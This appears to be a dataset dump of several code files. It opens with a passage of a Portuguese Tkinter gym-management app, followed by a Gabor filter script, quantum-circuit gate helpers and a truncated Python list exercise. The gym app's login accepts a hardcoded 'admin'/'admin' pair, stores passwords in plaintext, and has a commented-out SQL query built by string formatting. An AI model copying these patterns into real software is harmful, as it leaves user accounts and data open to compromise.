DO DIA\r\n self.frame3.place(relx = 0.7, rely = 0.14, relwidth = 0.25, relheight = 0.07)\r\n\r\n self.frame4 = Frame(self, bg = self.cor_cinza) # Frame para a quantidade de alunos no momento\r\n self.frame4.place(relx = 0.23, rely = 0.76, relwidth = 0.2, relheight = 0.2)\r\n\r\n self.titulo = Label(self.frame1, # Titulo 'FLUXO DE ALUNOS'\r\n text='FLUXO DE ALUNOS',\r\n font=('Britannic Bold', 30),\r\n bg=self.cor_laranja,\r\n fg='black')\r\n self.titulo.place(relx = 0.1, rely = 0.15)\r\n\r\n self.txt1 = Label(self, # Título 'Você pode obter uma planilha com os alunos da academia:'\r\n text='Você pode obter uma planilha com os alunos da academia:',\r\n font=('Britannic', 20),\r\n bg='white',\r\n fg='black')\r\n self.txt1.place(relx = 0.02, rely = 0.15)\r\n\r\n self.txt2 = Label(self.frame4, # Título - Quantidade de pessoas \r\n text='Na academia agora:',\r\n font=('Britannic', 14),\r\n bg = self.cor_cinza,\r\n fg='black')\r\n self.txt2.place(relx = 0.032, rely = 0.03)\r\n\r\n self.img1 = PhotoImage(file='btn_obter_planilha.png') # Botão de Editar Perfil\r\n self.btn_edita = Button(self, image=self.img1, command = self.insere_log)\r\n self.btn_edita.place(relx=0.13, rely=0.22)\r\n\r\n self.img = PhotoImage(file='btn_voltar.PNG') # Botão de voltar para a página anterior \r\n self.btn_voltar = Button(self, image=self.img, command= self.clica_voltar)\r\n self.btn_voltar.place(relx=0.1, rely=0.8)\r\n\r\n # Configurações para a data do dia\r\n self.data_atual = date.today()\r\n self.data_e_hora_atuais = datetime.now()\r\n self.data_e_hora_em_texto = self.data_e_hora_atuais.strftime('%d/%m/%Y %H:%M')\r\n\r\n self.txt2 = Label(self.frame3, # Data do Dia\r\n 
text='{}'.format(self.data_e_hora_em_texto),\r\n font=('Britannic', 20, 'bold'),\r\n bg=self.cor_cinza,\r\n fg='black')\r\n self.txt2.place(relx = 0.1, rely = 0.16)\r\n self.alteracao()\r\n\r\n def alteracao(self):\r\n self.now = datetime.now()\r\n self.txt2['text'] = self.now.strftime('%d/%m/%Y %H:%M:%S') \r\n self.after(1000, self.alteracao)\r\n\r\n def get_log(self):\r\n for n in self.pessoas:\r\n self.listaCli.insert(\"\", END, values=n)\r\n self.conta_presentes()\r\n \r\n def insere_log(self):\r\n self.entrada = choice(self.alunos)\r\n self.contador = 0 \r\n for i in self.pessoas: # Percorre a lista de Pessoas\r\n if self.entrada == i[0] and len(i) < 3:\r\n self.listaCli.delete(*self.listaCli.get_children())\r\n i.append(self.txt2['text'])\r\n self.contador += 1\r\n \r\n if self.contador == 0:\r\n self.listaCli.delete(*self.listaCli.get_children())\r\n self.pessoas.append([self.entrada, self.txt2['text']])\r\n \r\n self.get_log() \r\n # Criar uma lista de nomes, inserir a entrada e a partir dela condiciona a saida, e inserir essas infrmações na lista do aluno determinado\r\n\r\n def conta_presentes(self):\r\n self.contador1 = 0 \r\n for i in self.pessoas: # Percorre a lista de Pessoas\r\n if len(i) < 3:\r\n self.contador1 += 1\r\n self.txt3 = Label(self.frame4, # Número - Quantidade de pessoas\r\n text=self.contador1,\r\n font=('Britannic', 45, 'bold'),\r\n bg = self.cor_cinza,\r\n fg='black')\r\n self.txt3.place(relx = 0.6, rely = 0.2)\r\n\r\n def clica_voltar(self): # Comando do botão\r\n self.hide()\r\n self.subframe = Tela_Inicial(self) # Próxima janela para ser aberta\r\n\r\n def hide(self):\r\n self.withdraw()\r\n def show(self):\r\n self.update()\r\n self.deiconify()\r\n\r\n# Tela para editar o Perfil \r\nclass Editar_Perfil(Toplevel): # ESSA 'class\"='\r\n # Atributos do app\r\n cor_laranja = '#f48c06'\r\n cor_cinza = '#ced4da'\r\n def __init__(self, original):\r\n self.original_frame = original\r\n Toplevel.__init__(self) # Importando o Metódo Construtor\r\n self.title('Editar Perfil') \r\n self.geometry('1340x680+290+200')\r\n self.configure(bg = 'white')\r\n # Ícone\r\n self.iconbitmap('powerup_icone.ico')\r\n\r\n self.widgets()\r\n\r\n def widgets(self):\r\n self.frame1 = Frame(self, bg = self.cor_laranja) # Frame para o título principal EDITAR PERFIL\r\n self.frame1.place(relx = 0, rely = 0, relwidth = 1, relheight = 0.13)\r\n\r\n self.titulo = Label(self.frame1, # Titulo 'EDTAR PERFIL'\r\n text='EDITAR PERFIL',\r\n font=('Britannic Bold', 30),\r\n bg=self.cor_laranja,\r\n fg='black')\r\n self.titulo.place(relx = 0.1, rely = 0.15)\r\n\r\n self.txt1 = Label(self, # Título 'Digite suas novas informações'\r\n text='Digite suas novas informações:',\r\n font=('Britannic', 20),\r\n bg='white',\r\n fg='black')\r\n self.txt1.place(relx = 0.1, rely = 0.15)\r\n\r\n self.nome = Label(self, # Título 'Nome:'\r\n text='Nome:',\r\n font=('Britannic Bold', 20),\r\n bg='white',\r\n fg='black')\r\n self.nome.place(relx = 0.1, rely = 0.22)\r\n\r\n self.nome_entry = Entry(self, # Entrada do novo nome \r\n bg=self.cor_cinza,\r\n fg='black',\r\n font=('Britannic Bold', 16))\r\n self.nome_entry.place(relx = 0.17, rely = 0.22, relwidth = 0.7, relheight = 0.06)\r\n\r\n self.nv_senha = Label(self, # Título 'Nova Senha:'\r\n text='Senha:',\r\n font=('Britannic Bold', 20),\r\n bg='white',\r\n fg='black')\r\n self.nv_senha.place(relx = 0.1, rely = 0.29)\r\n\r\n self.nv_senha_entry = Entry(self, # Entrada do nova senha\r\n bg=self.cor_cinza,\r\n show='*',\r\n fg='black',\r\n font=('Britannic Bold', 
16))\r\n self.nv_senha_entry.place(relx = 0.17, rely = 0.29, relwidth = 0.7, relheight = 0.06)\r\n\r\n self.cnf_nv_senha = Label(self, # Título 'Confirma Senha:'\r\n text='Confirma Senha:',\r\n font=('Britannic Bold', 20),\r\n bg='white',\r\n fg='black')\r\n self.cnf_nv_senha.place(relx = 0.01, rely = 0.36)\r\n\r\n self.cnf_nv_senha_entry = Entry(self, # Entrada do nova senha\r\n bg=self.cor_cinza,\r\n show='*',\r\n fg='black',\r\n font=('Britannic Bold', 16))\r\n self.cnf_nv_senha_entry.place(relx = 0.17, rely = 0.36, relwidth = 0.7, relheight = 0.06)\r\n\r\n self.btn_atualiza = Button(self, # Botão de Atualizar Informações\r\n bg = self.cor_laranja,\r\n fg='white',\r\n text='Atualizar',\r\n font=('Britannic Bold', 20))\r\n self.btn_atualiza.place(relx = 0.75, rely = 0.45, relwidth = 0.17, relheight = 0.08)\r\n\r\n self.img = PhotoImage(file='btn_voltar.PNG') # Botão de voltar para a página anterior \r\n self.btn_voltar = Button(self, image=self.img, command= self.clica_voltar)\r\n self.btn_voltar.place(relx=0.1, rely=0.8)\r\n\r\n def clica_voltar(self): # Comando do botão\r\n self.hide()\r\n self.subframe = Tela_Inicial(self) # Próxima janela para ser aberta\r\n\r\n def hide(self):\r\n self.withdraw()\r\n def show(self):\r\n self.update()\r\n self.deiconify()\r\n\r\n# Tela do Menu Principal\r\nclass Tela_Inicial(Toplevel):\r\n # Atributos do app\r\n cor_laranja = '#f48c06'\r\n cor_cinza = '#ced4da'\r\n\r\n def __init__(self, original):\r\n self.original_frame = original\r\n Toplevel.__init__(self) # Importando o Metódo Construtor\r\n self.title('Bem-Vindo ao POWER UP') \r\n self.geometry('1340x680+290+200')\r\n self.configure(bg = 'white')\r\n # Ícone\r\n self.iconbitmap('powerup_icone.ico')\r\n\r\n self.widgets()\r\n\r\n def widgets(self):\r\n self.ip = randint(100, 1000) # Gerador de IP para a academia\r\n\r\n self.frame1 = Frame(self, bg = self.cor_laranja) # Frame para o título principal 'Olá...'\r\n self.frame1.place(relx = 0, rely = 0, relwidth = 1, relheight = 0.13)\r\n\r\n self.frame2 = Frame(self, bg=self.cor_cinza)\r\n self.frame2.place(relx= 0.8, rely= 0.9, relwidth=0.19, relheight=0.09)\r\n\r\n self.titulo = Label(self.frame1, # Titulo 'Olá teste001'\r\n text='Olá, teste001', # ESSA VÁRIAVELK PRECISAR SER RETIFICADA COMO UMA VÁRIAVEL CONECTADA AO BANCO DE DADOS\r\n font=('Britannic Bold', 30),\r\n bg=self.cor_laranja,\r\n fg='black')\r\n self.titulo.place(relx = 0.1, rely = 0.15)\r\n\r\n self.titulo = Label(self.frame2, # Demostra o IP da academia\r\n text=f'IP da Academia: {self.ip}', \r\n font=('Britannic Bold', 12),\r\n bg=self.cor_cinza,\r\n fg='black')\r\n self.titulo.place(relx = 0.01, rely = 0.05)\r\n\r\n ## Botões do Menu Principal ##\r\n self.img1 = PhotoImage(file='btn_edit_perfil.png') # Botão de Editar Perfil\r\n self.btn_edita = Button(self, image=self.img1, command= self.clica_btn_edita)\r\n self.btn_edita.place(relx=0.1, rely=0.3)\r\n\r\n self.img2 = PhotoImage(file='btn_fluxo.PNG') # Botão de Editar Perfil\r\n self.btn_fluxo = Button(self, image=self.img2, command= self.clica_btn_fluxo)\r\n self.btn_fluxo.place(relx=0.4, rely=0.3)\r\n\r\n self.img3 = PhotoImage(file='btn_edit_fichas.PNG') # Botão de Editar Perfil\r\n self.btn_edt_fichas = Button(self, image=self.img3, command= self.clica_btn_ficha)\r\n self.btn_edt_fichas.place(relx=0.7, rely=0.3) \r\n\r\n def clica_btn_edita(self): # Comando do botão\r\n self.hide()\r\n self.subframe = Editar_Perfil(self) # Próxima janela para ser aberta\r\n\r\n def clica_btn_fluxo(self): # Comando do botão\r\n 
self.hide()\r\n self.subframe = Tela_Fluxo(self) # Próxima janela para ser aberta\r\n\r\n def clica_btn_ficha(self): # Comando do botão\r\n self.hide()\r\n self.subframe = Tela_Fichas(self) # Próxima janela para ser aberta\r\n\r\n def hide(self):\r\n self.withdraw()\r\n def show(self):\r\n self.update()\r\n self.deiconify()\r\n\r\n# Tela de Cadastro\r\nclass Cadastro(Toplevel):\r\n # Atributos do app\r\n cor_laranja = '#f48c06'\r\n cor_cinza = '#ced4da'\r\n def __init__(self, original):\r\n self.original_frame = original\r\n Toplevel.__init__(self) # Importando o Metódo Construtor\r\n self.title('Cadastre-se no POWER UP') \r\n self.geometry('1340x680+290+200')\r\n self.configure(bg = 'white')\r\n # Ícone\r\n self.iconbitmap('powerup_icone.ico')\r\n\r\n self.widgets()\r\n\r\n def widgets(self):\r\n self.frame1 = Frame(self, bg = self.cor_laranja) # Frame para o título principal 'Cadastro'\r\n self.frame1.place(relx = 0, rely = 0.11, relwidth = 1, relheight = 0.13)\r\n\r\n self.titulo = Label(self.frame1, # Titulo 'CADASTRO'\r\n text='CADASTRO',\r\n font=('Britannic Bold', 30),\r\n bg=self.cor_laranja,\r\n fg='black')\r\n self.titulo.place(relx = 0.1, rely = 0.15)\r\n\r\n self.email = Label(self, # Título 'E-mail'\r\n text='E-mail:',\r\n font=('Britannic Bold', 20),\r\n bg='white',\r\n fg='black')\r\n self.email.place(relx = 0.15, rely = 0.28)\r\n\r\n self.email_entry = Entry(self, # Entrada de e-mail\r\n bg=self.cor_cinza,\r\n fg='black',\r\n font=('Britannic Bold', 16))\r\n self.email_entry.place(relx = 0.22, rely = 0.28, relwidth = 0.7, relheight = 0.06)\r\n\r\n self.nome = Label(self, # Título 'Nome'\r\n text='Nome:',\r\n font=('Britannic Bold', 20),\r\n bg='white',\r\n fg='black')\r\n self.nome.place(relx = 0.15, rely = 0.35)\r\n\r\n self.nome_entry = Entry(self, # Entrada do Nome\r\n bg=self.cor_cinza,\r\n fg='black',\r\n font=('Britannic Bold', 16))\r\n self.nome_entry.place(relx = 0.22, rely = 0.35, relwidth = 0.7, relheight = 0.06)\r\n\r\n self.senha = Label(self, # Título 'Senha'\r\n text='Senha:',\r\n font=('Britannic Bold', 20),\r\n bg='white',\r\n fg='black')\r\n self.senha.place(relx = 0.15, rely = 0.42)\r\n\r\n self.senha_entry = Entry(self, # Entrada de senha\r\n show = '*',\r\n bg=self.cor_cinza,\r\n fg='black',\r\n font=('Britannic Bold', 16))\r\n self.senha_entry.place(relx = 0.22, rely = 0.42, relwidth = 0.7, relheight = 0.06)\r\n\r\n self.conf_senha = Label(self, # Título 'Confirma Senha'\r\n text='Confirma Senha:',\r\n font=('Britannic Bold', 20),\r\n bg='white',\r\n fg='black')\r\n self.conf_senha.place(relx = 0.06, rely = 0.49)\r\n\r\n self.conf_senha_entry = Entry(self, # Entrada de confirmação\r\n show = '*',\r\n bg=self.cor_cinza,\r\n fg='black',\r\n font=('Britannic Bold', 16))\r\n self.conf_senha_entry.place(relx = 0.22, rely = 0.49, relwidth = 0.7, relheight = 0.06)\r\n\r\n self.btn_cadastra = Button(self, # Botão de Cadastrar\r\n bg = self.cor_laranja,\r\n fg='white',\r\n text='Cadastrar',\r\n font=('Britannic Bold', 20),\r\n command= self.novo_user)\r\n self.btn_cadastra.place(relx = 0.75, rely = 0.58, relwidth = 0.17, relheight = 0.08)\r\n\r\n self.img = PhotoImage(file='btn_voltar.PNG') # Botão de voltar para a página anterior \r\n self.btn_voltar = Button(self, image=self.img, command= self.onClose)\r\n self.btn_voltar.place(relx=0.1, rely=0.8)\r\n\r\n def limpa_tela(self):\r\n self.email_entry.delete(0, END)\r\n self.nome_entry.delete(0, END)\r\n self.senha_entry.delete(0, END)\r\n\r\n def confirma_senha(self): # Mensagem de confirmação para a entrada e 
verficação da confimação de tela\r\n if self.senha_entry.get() == self.conf_senha_entry.get():\r\n self.opcao = messagebox.askokcancel('POWER UP', 'Novo Usuário cadastrado com sucesso\\nClique em OK para entrar.')\r\n if self.opcao == True:\r\n self.clica_ok()\r\n\r\n else:\r\n messagebox.askokcancel('POWER UP', 'A confimação de senha não é correspondente. Insira novamente')\r\n self.senha_entry.delete(0, END)\r\n self.conf_senha_entry.delete(0, END)\r\n\r\n def novo_user(self):\r\n # Identificando se as variavéis estão preenchidas\r\n if self.nome_entry.get() == '':\r\n msg = \"Digite um nome para o usuário\"\r\n messagebox._show('Cadastro de usuário - Aviso!', msg)\r\n\r\n elif self.email_entry.get() == '':\r\n msg = \"Digite um email para o usuário\"\r\n messagebox._show('Cadastro de usuário - Aviso!', msg)\r\n\r\n elif self.senha_entry.get() == '':\r\n msg = \"Digite um senha para o usuário\"\r\n messagebox._show('Cadastro de usuário - Aviso!', msg)\r\n\r\n else:\r\n self.nome_var = self.nome_entry.get()\r\n self.email_var = self.email_entry.get()\r\n self.senha_var = self.senha_entry.get()\r\n\r\n # Incorpora os métodos user e executa\r\n self.ddl = DDL()\r\n self.ddl.insere_user(self.nome_var, self.email_var, self.senha_var)\r\n\r\n self.confirma_senha()\r\n self.limpa_tela() # método de limpar tela\r\n\r\n def clica_ok(self):\r\n self.hide()\r\n self.subframe = Tela_Inicial(self) # Próxima janela para ser aberta\r\n\r\n def onClose(self): # Comando do botão voltar \r\n self.destroy()\r\n self.original_frame.show()\r\n\r\n def hide(self):\r\n self.withdraw()\r\n def show(self):\r\n self.update()\r\n self.deiconify()\r\n\r\n# Tela Inicial \r\nclass Aplicativo:\r\n # Atributos do app\r\n cor_laranja = '#f48c06'\r\n cor_cinza = '#ced4da'\r\n\r\n def __init__(self): # Método Construtor\r\n self.root = root\r\n self.tela()\r\n self.widgets()\r\n\r\n # Entrada com 'Return'\r\n self.root.bind(\"\", self.clica_entrar)\r\n\r\n self.bd = DDL()\r\n self.bd.cria_tabela()\r\n\r\n root.mainloop()\r\n\r\n def tela(self): # Configurações de Tela\r\n self.root.title('POWER UP') \r\n self.root.geometry('1340x680+290+200')\r\n self.root.configure(bg=\"white\")\r\n # Ícone\r\n self.root.iconbitmap('powerup_icone.ico')\r\n\r\n def widgets(self):\r\n self.frame1 = Frame(self.root, bg = self.cor_laranja) # Frame para o título principal 'Entrar'\r\n self.frame1.place(relx = 0, rely = 0.11, relwidth = 1, relheight = 0.13)\r\n\r\n self.titulo = Label(self.frame1, # Titulo 'ENTRAR'\r\n text='ENTRAR',\r\n font=('Britannic Bold', 30),\r\n bg=self.cor_laranja,\r\n fg='black')\r\n self.titulo.place(relx = 0.1, rely = 0.15)\r\n\r\n self.email = Label(self.root, # Título 'E-mail'\r\n text='E-mail:',\r\n font=('Britannic Bold', 20),\r\n bg='white',\r\n fg='black')\r\n self.email.place(relx = 0.15, rely = 0.28)\r\n\r\n self.email_entry = Entry(self.root, # Entrada de e-mail\r\n bg=self.cor_cinza,\r\n fg='black',\r\n font=('Britannic Bold', 16))\r\n self.email_entry.place(relx = 0.22, rely = 0.28, relwidth = 0.7, relheight = 0.06)\r\n\r\n self.senha = Label(self.root, # Título 'Senha'\r\n text='Senha:',\r\n font=('Britannic Bold', 20),\r\n bg='white',\r\n fg='black')\r\n self.senha.place(relx = 0.15, rely = 0.35)\r\n\r\n self.senha_entry = Entry(self.root, # Entrada de senha\r\n show = '*',\r\n bg=self.cor_cinza,\r\n fg='black',\r\n font=('Britannic Bold', 16))\r\n self.senha_entry.place(relx = 0.22, rely = 0.35, relwidth = 0.7, relheight = 0.06)\r\n\r\n self.txt1 = Label(self.root, # Título 'Esquece sua Senha'\r\n 
text='Esqueceu sua senha?',\r\n font=('Britannic', 20),\r\n bg='white',\r\n fg='black')\r\n self.txt1.place(relx = 0.15, rely = 0.43)\r\n\r\n self.btn_senha = Button(self.root, # Botão de Esqueceu a Senha\r\n bg = self.cor_laranja,\r\n fg='white',\r\n text='Substituir Senha',\r\n font=('Britannic Bold', 20))\r\n self.btn_senha.place(relx = 0.17, rely = 0.5, relwidth = 0.17, relheight = 0.06)\r\n\r\n self.btn_entrar = Button(self.root, # Botão de Entrar\r\n bg = self.cor_laranja,\r\n fg='white',\r\n text='Entrar',\r\n font=('Britannic Bold', 20),\r\n command=self.clica_entrar)\r\n self.btn_entrar.place(relx = 0.75, rely = 0.43, relwidth = 0.17, relheight = 0.08) \r\n\r\n self.txt2 = Label(self.root, # Título 'Não possui cadastro'\r\n text='Caso não possua conta, clique em cadastre-se:',\r\n font=('Britannic', 20),\r\n bg='white',\r\n fg='black')\r\n self.txt2.place(relx = 0.15, rely = 0.7)\r\n\r\n self.btn_cadastro = Button(self.root, # Botão de Cadastro\r\n bg = self.cor_laranja,\r\n fg='white',\r\n text='Cadastra-se',\r\n font=('Britannic Bold', 20),\r\n command= self.clica_cadastro)\r\n self.btn_cadastro.place(relx = 0.17, rely = 0.76, relwidth = 0.17, relheight = 0.08)\r\n\r\n def limpa_tela(self):\r\n self.email_entry.delete(0, END)\r\n self.senha_entry.delete(0, END)\r\n\r\n def clica_cadastro(self): # Comando do botão\r\n self.hide()\r\n self.subframe = Cadastro(self) # Próxima janela para ser aberta\r\n\r\n def clica_entrar(self, *args): # Comando do botão\r\n self.email_var = self.email_entry.get()# Atribui o email para a varíavel 'self.email_var'\r\n self.senha_var = self.senha_entry.get() # Atribui o senha para a varíavel 'self.senha var'\r\n\r\n if self.email_var == '':\r\n messagebox._show('Cadastro de usuário - Aviso!', 'Digite um email para o usuário')\r\n\r\n elif self.senha_var == '':\r\n messagebox._show('Cadastro de usuário - Aviso!', 'Digite um senha para o usuário')\r\n \r\n else:\r\n self.email_var = self.email_entry.get()# Atribui o email para a varíavel 'self.email_var'\r\n self.senha_var = self.senha_entry.get() # Atribui o senha para a varíavel 'self.senha var'\r\n\r\n if self.bd.verifica_cliente(self.email_var, self.senha_var) == 'Confirmado':\r\n self.limpa_tela()\r\n self.hide()\r\n self.tela_inicial = Tela_Inicial(self) # Verifica o cliente no banco de dados - ESSA FUNCIONALIDADE PRECISA SER REFATORADA\r\n \r\n def hide(self):\r\n self.root.withdraw()\r\n def show(self):\r\n self.root.update()\r\n self.root.deiconify()\r\n\r\nclass DDL: # Manipulação da Tabela\r\n contimetro = 0 # Varíavel que ontabiliza a quantidade de tentativas do usuário\r\n\r\n def variaveis(self, nome, email, senha):\r\n self.email_var = email\r\n self.nome_var = nome\r\n self.senha_var = senha\r\n\r\n def conecta_bd(self):\r\n self.conn = sqlite3.connect('pup_dates.db') # Conectando com o Banco de Dados do Aplicativo\r\n self.cur = self.conn.cursor() # Cursor de busca no Banco de Dados\r\n print('Conectado ao Banco de Dados')\r\n\r\n def desconecta_bd(self):\r\n self.conn.close()\r\n print('Desconectado do Banco de Dados')\r\n\r\n def cria_tabela(self):\r\n self.conecta_bd()\r\n self.cur.execute('''CREATE TABLE IF NOT EXISTS users(id INT AUTO_INCREMENT PRIMARY KEY, nome_cliente varchar(80), email_cliente varchar(80), senha_cliente varchar(80))''')\r\n self.conn.commit()\r\n print('Banco de Dados criado com sucesso')\r\n self.desconecta_bd()\r\n\r\n def insere_user(self, nome, email, senha): # Insere o novo usuário no BD\r\n # Executa no Banco de Dados \r\n self.conecta_bd()\r\n # 
Verifica se o cliente já é cadastrado.\r\n self.verifica_cliente(email, senha)\r\n self.cur.execute(\"\"\"\r\n INSERT INTO users(nome_cliente, email_cliente, senha_cliente)\r\n VALUES(?, ?, ?);\"\"\", (nome, email, senha))\r\n self.conn.commit()\r\n print('Valores Inseridos')\r\n self.desconecta_bd()\r\n\r\n def verifica_cliente(self, email, senha): # Método para verificar o usuário no BD\r\n print(\"\\nVerficando Cliente\\n\") \r\n #self.conecta_bd()\r\n\r\n # VERIFICANDO EM UMA CONDIÇÃO FORA DO BANDO DE DADOS\r\n if email == 'admin' and senha == 'admin':\r\n #self.verfica = self.cur.execute(\"SELECT * FROM users WHERE email_cliente = {}\".format(email)) # Comando de verificação do usuário no Bando da Dados\r\n return 'Confirmado'\r\n \r\n else:\r\n messagebox.askokcancel('POWER UP', 'A senha ou e-mail não correposnde a um usuário cadastrado')\r\n #self.desconecta_bd()\r\n\r\n##### PROGRAMA PRINCIPAL #####\r\nroot = Tk()\r\nAplicativo()","repo_name":"Leopoldino005/POWER-UP","sub_path":"main_up.py","file_name":"main_up.py","file_ext":"py","file_size_in_byte":33017,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"6912695699","text":"from skimage import data, filters\nimport matplotlib.pyplot as plt\n\nimg = data.camera()\n\nfilter_real, filter_image = filters.gabor(img, frequency=0.7)\n\nfig, (x, y, z) = plt.subplots(ncols=3, figsize=(15, 6))\nx.imshow(img)\ny.imshow(filter_real, cmap=\"gray\")\nz.imshow(filter_image, cmap=\"gray\")\n\nplt.figure(figsize=(30, 8))\n\nplt.subplot(131)\nplt.imshow(img)\n\nplt.subplot(132)\nplt.imshow(filter_real)\n\nplt.subplot(133)\nplt.imshow(filter_image)\n\nplt.tight_layout()\nplt.show()\n","repo_name":"finepix/py_workspace","sub_path":"opencv_learn/gabor.py","file_name":"gabor.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"44"} +{"seq_id":"32465449726","text":"import pandas as pd\nimport numpy as np\n\n\n\n\"\"\"\nTo do: find a better name for channel_param as default for loading channel params (since you might also have some other stuff...)\n\"\"\"\n\ndef u2_db(translator,a,b,**kwargs):\n block_id = kwargs.get(\"block_id\",0)\n params = kwargs.get(\"params\",True)\n def give_param(params, k):\n if params is not True:\n return None\n else:\n return np.random.normal(0,2*np.pi)\n return pd.DataFrame([gate_template(k, block_id=block_id, param_value = give_param(params,k)) for i,k in enumerate(u2(translator,a,b))])\n\ndef u1_db(translator,q,**kwargs):\n block_id = kwargs.get(\"block_id\",0)\n params = kwargs.get(\"params\",True)\n def give_param(params, k):\n if params is not True:\n return None\n else:\n return np.random.normal(0,2*np.pi)\n return pd.DataFrame([gate_template(k, block_id=block_id, param_value = give_param(params,k)) for i,k in enumerate(u1(translator,q))])\n\ndef u2_layer(translator,**kwargs):\n block_id = kwargs.get(\"block_id\",0)\n dd = u2_db(translator,0,1)\n for i in range(1,translator.n_qubits):\n dd = concatenate_dbs([dd,u2_db(translator,i,(i+1)%translator.n_qubits, block_id=block_id)])\n return dd\n\ndef u1_layer(translator, **kwargs):\n block_id = kwargs.get(\"block_id\",0)\n params = kwargs.get(\"params\",True)\n qubits_ind = kwargs.get(\"qubits_ind\",None)\n if qubits_ind is None:\n qubits_ind = list(range(translator.n_qubits))\n dd = u1_db(translator,qubits_ind[0], block_id=block_id, params = params)\n for i in qubits_ind[1:]:\n dd = concatenate_dbs([dd,u1_db(translator,i, 
block_id=block_id, params = params)])\n return dd\n\n\ndef x_layer(translator, **kwargs):\n block_id = kwargs.get(\"block_id\",0)\n params = kwargs.get(\"params\",True)\n qubits_ind = kwargs.get(\"qubits_ind\",None)\n if qubits_ind is None:\n qubits_ind = list(range(translator.n_qubits))\n def give_param(params):\n if params is not True:\n return None\n else:\n return np.random.normal(0,2*np.pi)\n xx = pd.DataFrame([gate_template(k, param_value=0.,block_id=block_id, params=give_param(params)) for k in [translator.number_of_cnots + translator.n_qubits+j for j in qubits_ind]])\n return xx\n\ndef z_layer(translator,**kwargs):\n block_id = kwargs.get(\"block_id\",0)\n random_param = kwargs.get(\"block_id\", True)\n random_param = lambda x: 0. if x is False else np.float32(np.pi*np.random.random())\n zz = pd.DataFrame([gate_template(k, param_value=random_param(random_param), block_id=block_id) for k in [translator.number_of_cnots +j for j in range(translator.n_qubits)]])\n return zz\n\ndef cnot_layer(translator, **kwargs):\n touching = kwargs.get(\"touching\",False)\n block_id = kwargs.get(\"block_id\",0)\n if touching is True:\n inds_cnots = range(0,translator.n_qubits,2)\n else:\n inds_cnots = range(0,translator.n_qubits)\n cnots = [translator.cnots_index[str([k,(k+1)%translator.n_qubits])] for k in inds_cnots]\n return pd.DataFrame([gate_template(k, block_id=block_id) for k in cnots])\n\n\ndef concatenate_dbs(dbs):\n d = dbs[0]\n for dd in dbs[1:]:\n d = pd.concat([d,dd])\n d = d.reset_index(drop=True)\n return d\n\ndef what_if_none(x,alternative=None):\n \"\"\"\n aid method for give_gate_template\n \"\"\"\n if x is None:\n return alternative\n else:\n return x\n\ndef gate_template(ind,**kwargs):\n \"\"\"\n Creates a dictionary (that is later converted into pandas dataframe) describing rows of gate associated to ind. 
Used as initialization shortcut.\n gate_id: {\"param_value\":None, \"trainable\":True, \"block_id\":0, \"movable\":True}\n \"\"\"\n dicti = {\"ind\": ind}\n dicti[\"symbol\"] = what_if_none(kwargs.get(\"symbol\"))\n dicti[\"param_value\"] = what_if_none(kwargs.get(\"param_value\"),None)\n dicti[\"trainable\"] = what_if_none(kwargs.get(\"trainable\"),True)\n dicti[\"block_id\"] = what_if_none(kwargs.get(\"block_id\"), 0)\n\n qubits = kwargs.get(\"qubits\", None)\n if qubits is not None:\n dicti[\"qubits\"] = qubits\n\n channel_param = kwargs.get(\"channel_param\", False)\n if (channel_param is True):\n dicti[\"channel_param\"] = True\n return dicti\n\n\ndef rz(translator, q):\n return translator.number_of_cnots + q\ndef rx(translator, q):\n return translator.number_of_cnots + translator.n_qubits + q\ndef ry(translator, q):\n return translator.number_of_cnots + 2*translator.n_qubits + q\ndef cnot(translator, q0, q1):\n return translator.cnots_index[str([q0,q1])]\ndef u1(translator, q):\n return [rz(translator, q), rx(translator,q), rz(translator,q)]\ndef u2(translator, q0, q1):\n \"\"\"general two-qubit gate\"\"\"\n l=[ u for u in u1(translator,q0)]\n for u in u1(translator, q1):\n l.append(u)\n l.append(cnot(translator,q0,q1))\n l.append(rz(translator,q0))\n l.append(ry(translator,q1))\n l.append(cnot(translator,q1,q0))\n l.append(ry(translator,q1))\n l.append(cnot(translator,q0,q1))\n for u in u1(translator, q0):\n l.append(u)\n for u in u1(translator, q1):\n l.append(u)\n return l\n\n\n### channels\ndef amplitude_damping_db(translator, qubits_ind, eta, block_id=1, entire_circuit=False):\n \"\"\"\n qubits_ind: list of indices of the qubits ---> [system, ancilla (environment)]\n block_id: number that VANs uses to identify the channel and not touch it.\n eta: damping strength (note that the rotation is twice the value!)\n \"\"\"\n channel = []\n if not hasattr(translator, \"discard_qubits\"):\n raise AttributeError(\"please specify environment qubits, just ot keep track of things. 
For instance, this is used in the minimizer\")#translator.env_qubits = []\n if qubits_ind[1] not in translator.discard_qubits:\n raise AttributeError(\"please check your env qubits & order in which qubits this template are called for, otherwise things can mess up.\")\n if block_id not in translator.untouchable_blocks:\n raise AttributeError(\"please check your untouchable_blocks.\")\n\n ## controlled-Ry(2*eta)\n ### H on each qubit\n for qindex in qubits_ind: ##list on qubits suffering from the channel\n channel.append( translator.number_of_cnots + 3*translator.n_qubits + qindex )\n ###CNOT[q1,q0]\n channel.append(translator.cnots_index[str(qubits_ind[::-1])])\n ###Ry(eta)(q1)\n channel.append(translator.number_of_cnots + 2*translator.n_qubits + qubits_ind[1] )\n ###CNOT[q1,q0]\n channel.append(translator.cnots_index[str(qubits_ind[::-1])])\n ### H on eahc qubit\n for qindex in qubits_ind:\n channel.append( translator.number_of_cnots + 3*translator.n_qubits + qindex )\n ### Ry(2*eta)(q1)\n channel.append(translator.number_of_cnots + 2*translator.n_qubits + qubits_ind[1] )\n\n\n ## CNOT[q1,q0]\n channel.append(translator.cnots_index[str(qubits_ind[::-1])])\n\n index_eta = translator.number_of_cnots + 2*translator.n_qubits + qubits_ind[1]\n give_value_eta = lambda x, eta_value: None if x!= index_eta else eta_value\n is_rotation = lambda x: True if translator.number_of_cnots<=x maior:\r\n maior = num[c]\r\n elif num[c] < menor:\r\n menor = num[c]\r\n\r\nprint(f'Os valores digitados na lista foram: {num}')\r\nprint(f'O maior valor da lista foi: {maior} nas posições: ',end='')\r\nfor i, v in enumerate(num):\r\n if v == maior:\r\n print(f'{i}...',end='')\r\nprint()\r\nprint(f'O menor valor da lista foi: {menor} nas posições: ',end='')\r\nfor i, v in enumerate(num):\r\n if v == menor:\r\n print(f'{i}...',end='')\r\nprint()\r\n\r\n","repo_name":"JonathanRodrigues123/meus-estudos-python","sub_path":"Mundo 3 - Exercicios/Ex078 - listas parte 1.py","file_name":"Ex078 - listas parte 